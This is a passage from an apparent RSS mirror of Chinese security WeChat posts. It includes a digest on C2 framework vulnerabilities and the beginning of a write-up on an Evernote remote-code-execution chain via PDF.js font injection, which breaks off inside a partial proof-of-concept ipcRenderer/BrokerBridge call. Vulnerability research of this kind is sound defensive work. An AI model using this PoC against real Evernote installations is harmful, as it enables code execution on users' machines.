11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[5]</span></span>《Xbox系统内核漏洞利用》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="https://github.com/exploits-forsale/collateral-damage" target="_blank">https://github.com/exploits-forsale/collateral-damage</a></em></p><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[6]</span></span>《利用Ollama插件在本地重命名Binary Ninja函数和变量》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="https://github.com/ahaggard2013/binaryninja-ollama" target="_blank">https://github.com/ahaggard2013/binaryninja-ollama</a></em></p><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[7]</span></span>《利用SharpHound工具进行Active Directory攻击路径管理和检测》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="https://ipurple.team/2024/07/15/sharphound-detection/" target="_blank">https://ipurple.team/2024/07/15/sharphound-detection/</a></em></p><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[8]</span></span>《字符集差异：为何编码重要》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/&amp;utm_term=&amp;s_category=Organic&amp;s_source=Social%20Media&amp;s_origin=twitter" target="_blank">https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/&amp;utm_term=&amp;s_category=Organic&amp;s_source=Social%20Media&amp;s_origin=twitter</a></em></p><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[9]</span></span>《无需进程注入的新型代码执行方法》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="https://cicada-8.medium.com/process-injection-is-dead-long-live-ihxhelppaneserver-af8f20431b5d" target="_blank">https://cicada-8.medium.com/process-injection-is-dead-long-live-ihxhelppaneserver-af8f20431b5d</a></em></p></section></section><section style="letter-spacing: normal;text-align: start;text-wrap: wrap;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;height: auto;margin-bottom: 0px;width: auto;"><p><em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"></em></p></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247487376">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6c996101&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487376%26idx%3D1%26sn%3D91811b4060ac53269a79bc93f947f827%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 16 Jul 2024 08:20:00 +0800</pubDate>
    </item>
    <item>
      <title>专题：2024 一些 C2 反制</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487353&amp;idx=1&amp;sn=6b8bdf97ee3977018f28dde57b4205d0</link>
      <description>专题：2024 一些 C2 反制</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-15 09:17</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>专题：2024 一些 C2 反制</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=260e20f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZn0AnIVBNwIS6v6Ux37cfLD0RWoTKSgKUSA2e5yIFx48ianUSzHlAFqfVDGZHIPW2UOnc2HIMyveRQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;"><h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 1593px;-webkit-box-reflect: unset;"><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 1593px;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-15 安全「信息差」<span style="line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 1593px;height: auto;align-items: unset;box-shadow: none;display: block;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span></h1><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">1. 推送「新、热、赞」，降噪增效<br/></p><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">2. 查漏补缺，你可能错过了一些小东西</p></blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01帝国C2框架的利用漏洞分析与防范建议</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDzRNmGjtJcVOJFicR0yiakqY0VPE9aZt3tibrdY56rsylLIyuDVQYWG3hw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDzRNmGjtJcVOJFicR0yiakqY0VPE9aZt3tibrdY56rsylLIyuDVQYWG3hw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522185551184482"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02 RogueSliver工具破坏Sliver C2框架活动</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDqBmfIqsFpkhPfOwcaofqudbaeePz8MIuzlzb2NUw6E148qVbxiaaY2g/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDqBmfIqsFpkhPfOwcaofqudbaeePz8MIuzlzb2NUw6E148qVbxiaaY2g/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418884242141"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03 CHAOS RAT v5.01网络面板远程代码执行漏洞分析</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDZuY2q6evjQjkGWVMIZnj1ngGsw3MfT2y1TNsq7x4q7cQgSYaxhaMLA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDZuY2q6evjQjkGWVMIZnj1ngGsw3MfT2y1TNsq7x4q7cQgSYaxhaMLA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855418884855882"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04 proctools：Windows进程信息提取与字符串转储工具</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDia6dnGWplHibWWTGJ1eDjXtBXaibIxibW5kz5s9micNRjicUFia43lg3uS0mw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDia6dnGWplHibWWTGJ1eDjXtBXaibIxibW5kz5s9micNRjicUFia43lg3uS0mw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522114184181522"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05 Havoc C2团队服务器上的未经身份验证SSRF漏洞</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDIRGG8QFmLBGe71se4kQtvjJb6RHakkzcniaW9qiasY1z60DTMqUNfNOQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDIRGG8QFmLBGe71se4kQtvjJb6RHakkzcniaW9qiasY1z60DTMqUNfNOQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122445448185244"></mp-common-miniprogram></section><pre style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="margin-bottom: -7px;display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/98Nz5LFElxzdExAnJcAwRIq2IIHILR4B4jrwEPb1lOJkr0MbPEpgEGkibpic5JdqX37KQGhyH9pyMEjvn4Ve17KgmCXxV6NBIw/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 558px;border-radius: 5px;"></span><code style="padding: 15px 16px 16px;overflow-x: auto;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;">部分能力后期会开放，比如知识库/迪斯科等，星球身份是后期各服务的通行证<br/>AI目前比较贵，为了可持续发展，设置了星球的地板价<span style="color: rgb(209, 154, 102);line-height: 26px;">25</span>元(系统最低价)</code></pre><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003701" data-ratio="0.575925925925926" data-s="300,640" style="color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;letter-spacing: normal;text-align: center;text-wrap: wrap;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9511ffa4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnoZE3o2M5pWUSdvydKbsn5xaQ0PicicMvUtGqYwKthtBwkQ0YY4jQ69HMp6mQnK9n7LN8Mpvc8JSGg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247487353">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9c3aed81&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487353%26idx%3D1%26sn%3D6b8bdf97ee3977018f28dde57b4205d0%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 15 Jul 2024 09:17:00 +0800</pubDate>
    </item>
    <item>
      <title>Evernote 应用中PDF.js字体注入导致跨平台远程代码执行漏洞</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487332&amp;idx=1&amp;sn=71b33d61aa38bffd24ebc8ac825b419f</link>
      <description>在Evernote应用中发现的关键性漏洞，该漏洞可以通过嵌入恶意PDF文件到笔记中，利用PDF.js的字体注入进行JavaScript代码执行，进而通过ipcRenderer和BrokerBridge实现跨进程通信，最终达到远程代码执行</description>
      <content:encoded><![CDATA[<p>
原创 <span>bggsec</span> <span>2024-07-11 08:00</span> <span style="display: inline-block;">北京</span>
</p>

<p>在Evernote应用中发现的关键性漏洞，该漏洞可以通过嵌入恶意PDF文件到笔记中，利用PDF.js的字体注入进行JavaScript代码执行，进而通过ipcRenderer和BrokerBridge实现跨进程通信，最终达到远程代码执行</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b41a0f33&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyibhbKU7E6pn3GLlOMNtnbiaoEeudV3tyZicuSmD3lq7enRrE46dAbpn6g%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;"><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;"><span style="display: none;"></span><span style="font-size: 22px;line-height: 1.5em;letter-spacing: 0em;font-weight: bold;display: block;">前言</span><span style="display: none;"></span></h2><blockquote data-tool="mdnice编辑器" style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px none rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">一句话总结(点击原文跳转)</p></blockquote><p data-tool="mdnice编辑器" style="line-height: 1.8em;letter-spacing: 0em;text-indent: 0em;padding-top: 8px;padding-bottom: 8px;">主要描述了一个在Evernote应用中发现的关键性漏洞，该漏洞可以通过嵌入恶意PDF文件到笔记中，利用PDF.js的字体注入进行JavaScript代码执行，进而通过Electron的ipcRenderer和BrokerBridge实现跨进程通信，最终达到远程代码执行（RCE）的攻击链。</p><section><video controls="" poster="https://wechat2rss.xlab.app/img-proxy/?k=2b1c28f5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyFwyueQU12QA1dVViagOCLMSOIwDdKsvWicgo1ibiauwQicw8p3RourYOVZg%2F0%3Fwx_fmt%3Djpeg" src="https://wechat2rss.xlab.app/video-proxy/?k=d59d6c48&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487332%26idx%3D1%26sn%3D71b33d61aa38bffd24ebc8ac825b419f%26subscene%3D0&amp;v=wxv_3541055379164233728"></video></section><blockquote data-tool="mdnice编辑器" style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px none rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">关键信息点</p></blockquote><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003676" data-ratio="1.8710407239819005" data-s="300,640" style="" data-type="png" data-w="884" src="https://wechat2rss.xlab.app/img-proxy/?k=a18766a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkDzC5njrov9XMbdIJSl0DyOC2NydInFzOIicJEOlk2cjgnbkdlqQu2fZl2RwcSnS2x7SSuqJXTojg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;margin-top: 10px;margin-bottom: 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/98Nz5LFElxzdExAnJcAwRIq2IIHILR4B4jrwEPb1lOJkr0MbPEpgEGkibpic5JdqX37KQGhyH9pyMEjvn4Ve17KgmCXxV6NBIw/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span style="color: #5c6370;font-style: italic;line-height: 26px;">//部分poc</span><br/>window.top.electronApi.ipcRenderer.send(<span style="color: #98c379;line-height: 26px;">&#39;BrokerBridge&#39;</span>, {action: <span style="color: #98c379;line-height: 26px;">&#39;Bridge/Call&#39;</span>,id: <span style="color: #98c379;line-height: 26px;">&#39;7e803824-d666-4ffe-9ebb-39ac1bd7856f&#39;</span>,topics: <span style="color: #98c379;line-height: 